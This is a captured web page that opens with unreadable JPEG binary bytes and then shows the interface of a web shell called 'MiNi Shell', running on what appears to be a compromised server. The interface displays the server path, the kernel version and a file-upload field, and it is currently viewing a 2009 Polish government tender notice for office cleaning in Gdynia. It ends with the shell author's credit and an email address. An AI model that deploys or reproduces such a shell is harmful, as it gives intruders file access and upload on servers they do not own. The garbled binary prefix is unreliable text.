JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090109/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090109/10379-N-2009.html

<p class="kh_header"><b>Gdynia: Usługa sprzątania w siedzibie Pomorskiego Oddziału Regionalnego Agencji Restrukturyzacji i Modernizacji Rolnictwa w Gdyni oraz w podległych 16 Biurach Powiatowych na terenie województwa pomorskiego.</b><br>
<b>Numer ogłoszenia: 10379 - 2009; data zamieszczenia: 09.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Restrukturyzacji i Modernizacji Rolnictwa Pomorski Oddział Regionalny , ul. Kołłątaja 1, 81-332 Gdynia, woj. pomorskie, tel. (0-58) 668-60-00/01, faks (0-58) 669-68-44.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.arimr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa sprzątania w siedzibie Pomorskiego Oddziału Regionalnego Agencji Restrukturyzacji i Modernizacji Rolnictwa w Gdyni oraz w podległych 16 Biurach Powiatowych na terenie województwa pomorskiego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem niniejszego postępowania o udzielenie zamówienia publicznego jest usługa kompleksowego sprzątania w siedzibie Pomorskiego Oddziału Regionalnego Agencji Restrukturyzacji i Modernizacji Rolnictwa przy ul. Kołłątaja 1 w Gdyni oraz w podległych 16 Biurach Powiatowych mieszczących się w każdym powiecie województwa pomorskiego, poprzez:
1) Codziennie:
- zamiatanie i zmywanie płaskich powierzchni podłóg,
- odkurzanie wykładzin oraz czyszczenia powstałych plam, 
- przecieranie na wilgotno oraz konserwacja zewnętrznych powierzchni mebli,
- opróżnianie śmieci z pojemników (w tym w niszczarkach biurowych) i wymiana worków foliowych,
- mycie przeszkleń w drzwiach wejściowych oraz witrynach przeszklonych,
- czyszczenie ścian pokrytych glazurą oraz mycie luster,
- mycie i dezynfekcja płaskich powierzchni podłóg z terakoty,
- przecieranie na wilgotno drzwi i parapetów,
- mycie i dezynfekcja ceramiki i armatury (zlewozmywaki, umywalki, muszle, pisuary, bidety, baterie umywalkowe),
- uzupełnianie środków czystości i higieny: papieru toaletowego, ręczników papierowych, mydła, środków zapachowych, kostek toaletowych, środków dezynfekujących, płynu do mycia naczyń, gąbek, worków foliowych.
2) Raz w miesiącu:
- czyszczenie obudowy lamp, grzejników c.o. oraz rur instalacji c.o.,
- mycie powierzchni zewnętrznej rur instalacji wodno-kanalizacyjnej,
- mycie lodówek - 19 szt.,
- czyszczenie powierzchni podłóg w pomieszczeniach archiwów pod nadzorem pracownika Zamawiającego. 
3) Raz na trzy miesiące:
- mycie okien wraz z ramami,
- czyszczenie żaluzji poziomych, aluminiowych,
4) Raz na rok:
- pranie wykładziny dywanowej preparatem wymaganym przez producenta,
- pokrycie powierzchni PCV akrylem.
2. Schody i podesty wejściowe do biur muszą być zachowane w czystości.
3. Wykonawca musi zapewnić 2 osoby sprzątające w czasie pracy Pomorskiego Oddziału Regionalnego ARiMR przy ul. Kołłątaja 1, w godz. 8.15 - 16.15, od poniedziałku do piątku.
4. Sprzątanie powierzchni sanitariatów oraz powierzchni socjalnych musi rozpocząć się po godz. 8.15, a zakończyć się przed godz. 16.15, natomiast pranie wykładziny dywanowej odbywać się będzie po godz. 16.15 w dni wolne od pracy, z wykluczeniem świat.
5. Dodatkowe wymagania:
1) wykonawca ma obowiązek wykonać usługę przy użyciu własnych środków czystości, konserwujących, higienicznych oraz narzędzi, w tym:
a) papieru toaletowego typu Jambo (duże rolki), biały, dwuwarstwowy, gramatura 20g/m2,
b) papieru toaletowego zwykłego (rolki małe) biały, dwuwarstwowy, gramatura 20g/m2,
c) ręczników papierowych białych, składanych (tzw. Zetki), o wymiarach 23x25, gramatura 40g/m2,
d) ręczników w roli - typu MIDI, biały dwuwarstwowy, gramatura 20g/m2,
e) mydła w płynie antybakteryjnego perfumowanego, zawierającego lanolinę lub pochodne lanoliny,
f) płynu do mycia naczyń bakteriobójczego, skoncentrowanego, zawierającego lanolinę lub pochodne lanoliny,
g) kostek toaletowych o działaniu antybakteryjnym, odświeżających i zapobiegających osadzaniu się kamienia o wadze nie mniejszej niż 40g.,
2) wykonawca zobowiązany jest podać zestawienie ważniejszych materiałów i środków czystości przewidzianych do zastosowania przy realizacji zamówienia z wyszczególnieniem nazw i ilości, oraz podania ich łącznego kosztu (w dniu podpisania umowy),
3) środki czystości i środki toaletowe powinny posiadać atest PZH oraz świadectwo dopuszczenia do obrotu,
4) wykonawca wyposaży swoich pracowników w jednolite ubrania z identyfikatorem pracownika,
5) sposób nadzoru nad wykonywaniem zamówienia: nadzór kierownika ze strony Wykonawcy; strony zobowiązują się do koordynowania i bieżącej kontroli właściwego wykonywania usług polegających na utrzymywaniu porządku i czystości; do kontaktów, przekazywania wzajemnych uwag wynikających z realizacji umowy oraz podpisywania protokołów strony wyznaczą po 1 (jednej) osobie; zamawiający zobowiązany jest do powiadomienia Wykonawcy na piśmie o każdorazowym stwierdzonym przypadku nienależytego wykonania usługi,
6) ilość osób realizujących umowę (§1 ust. 1 pkt 1 i 2 wzoru umowy) - 20 osób: 
a) 2 osoby nadzorujące pracę podwładnych, 
b) 2 osoby sprzątające w Pomorskim Oddziale Regionalnym ARiMR w Gdyni, 
c) po 1 osobie w Biurach Powiatowych ARiMR,
7) ilość osób realizujących umowę (dotyczy mycia okien i żaluzji oraz pranie wykładziny dywanowej i arylowania powierzchni PCV - §1 ust. 1 pkt 3 i 4 wzoru umowy) - 3 osoby.
6. Potwierdzeniem wykonania zakresu umowy będzie podpisanie protokołu wykonania usługi sprzątania przez Zamawiającego oraz osobę nadzorującą usługę ze strony Wykonawcy - raz w tygodniu (wzór protokołu stanowi Załącznik Nr 4 do wzoru umowy).
7. Na dzień 31.12.2008 r. w Pomorskim Oddziale Regionalnym Agencji Restrukturyzacji i Modernizacji Rolnictwa z siedzibą w Gdyni oraz w podległych 16 Biurach Powiatowych zatrudnionych było 437 osób.
8.Informacje dodatkowe (w tabeli na stronie 5 SIWZ podano łączną powierzchnię do sprzątania oraz powierzchnie w Pomorskim OR i 16 BP ARiMR).
9. Adresy lokali Agencji Restrukturyzacji i Modernizacji Rolnictwa na terenie województwa pomorskiego, objętych zamówieniem, przedstawia Załącznik Nr 1 do wzoru umowy. Zamawiający zastrzega sobie prawo zmiany lokalizacji siedzib jednostek, o czym poinformuje Wykonawcę na piśmie (z tygodniowym wyprzedzeniem), przy czym zmiana ta zostanie uwzględniona w formie aneksu do umowy zawartej z Wykonawcą i może skutkować zmianą wynagrodzenia Wykonawcy, odpowiednio do zmiany zakresu umowy.
10. Okres świadczenia usługi sprzątania: przez okres 11 miesięcy, tj. od dnia 02.02.2009 r. do dnia 31.12.2009 r..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.91.92.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 11.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają poniższe warunki:
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3) wykonali, a w przypadku świadczeń okresowych lub ciągłych wykonują, w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 (dwie) usługi sprzątania w obiektach biurowych o ogólnej powierzchni nie mniejszej niż 5.000 m2 (każda usługa); czas trwania każdej z tych usług minimum 1 rok;
4) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
5) są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności zgodnej z przedmiotem zamówienia na kwotę nie mniejszą niż 300.000,00 zł (słownie: trzysta tysięcy złotych) w okresie realizacji zamówienia;
6) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i ust. 2 ustawy Prawo zamówień publicznych.
2. Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach wyszczególnionych w Rozdziale X niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki wykonawca spełnił. 
3. Zamawiający na podstawie art. 26 ust. 3 ustawy Prawo zamówień publicznych wezwie wykonawców, którzy w określonym terminie nie złożyli wymaganych przez zamawiającego oświadczeń lub dokumentów potwierdzających spełnianie warunków udziału w postępowaniu oraz spełnianie przez oferowane usługi wymagań określonych przez zamawiającego, lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez zamawiającego oświadczenia i dokumenty na potwierdzenie spełnienia warunków udziału w postępowaniu oraz spełnienia przez oferowane usługi wymagań określonych przez zamawiającego, zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania.
Złożone na wezwanie zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane usługi wymagań określonych przez zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert.
4. Nie spełnienie chociażby jednego z w/w warunków skutkować będzie wykluczeniem Wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Oferta musi zawierać następujące oświadczenia i dokumenty:
1) Wypełniony Formularz Ofertowy (Załącznik Nr 1).
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wykonawcy składają jeden formularz ofertowy.
2) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej (wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert).
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagany dokument musi być złożony przez każdego wykonawcę.
3) Oświadczenie, że Wykonawca spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych (Załącznik Nr 2).
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagane oświadczenie  musi być złożone przez każdego wykonawcę.
4) Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, usług sprzątania w obiektach biurowych o ogólnej powierzchni nie mniejszej niż 5.000 m2 [każda usługa, co najmniej dwie usługi]; czas trwania każdej z tych usług minimum 1 rok - z podaniem ich wartości, przedmiotu (powierzchni), dat ich wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że usługi te zostały wykonane należycie (Załącznik Nr 3).
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagany wykaz może być złożony wspólnie lub oddzielnie przez wykonawców.
5) Pełnomocnictwo (oryginał lub notarialnie potwierdzoną kopię) do reprezentowania i podpisywania dokumentacji ofertowej, jeżeli Wykonawca jest reprezentowany niezgodnie z zapisem we właściwym rejestrze lub w zaświadczeniu o wpisie do ewidencji działalności gospodarczej (dotyczy to również w przypadku konsorcjum).
6) Aktualna na dzień składania ofert polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności zgodnej z przedmiotem zamówienia, na kwotę nie mniejszą niż 300.000,00 zł (słownie: trzysta tysięcy złotych) w okresie realizacji zamówienia.
7) Parafowany na wszystkich stronach przez wykonawcę lub osobę należycie umocowaną wzór umowy (Załącznik Nr 4).
2. Dokumenty i oświadczenia wymienione w ust. 1 pkt 2, 3, 4 i 6 służą do oceny potwierdzenia spełniania przez wykonawców warunków udziału w postępowaniu wynikających z Rozdziału V ust. 1 SIWZ.  
3. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, mają zastosowanie postanowienia §2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 87, poz. 605).
4. Wszystkie dokumenty przedstawione w formie kserokopii muszą być poświadczone za zgodność z oryginałem przez uprawnione osoby..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.arimr.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Agencja Restrukturyzacji i Modernizacji Rolnictwa - Pomorski Oddział Regionalny, ul. Kołłątaja 1, 81-332 Gdynia, w pokoju nr 215..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.01.2009 godzina 14:00, miejsce: Agencja Restrukturyzacji i Modernizacji Rolnictwa - Pomorski Oddział Regionalny, ul. Kołłątaja 1, 81-332 Gdynia, w Kancletarii Pomorskiego Oddziału Regionalnego ARiMR, pokój nr 231..</p><p><b>IV.3.5) Termin związania ofertą:</b> do 17.02.2009.</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com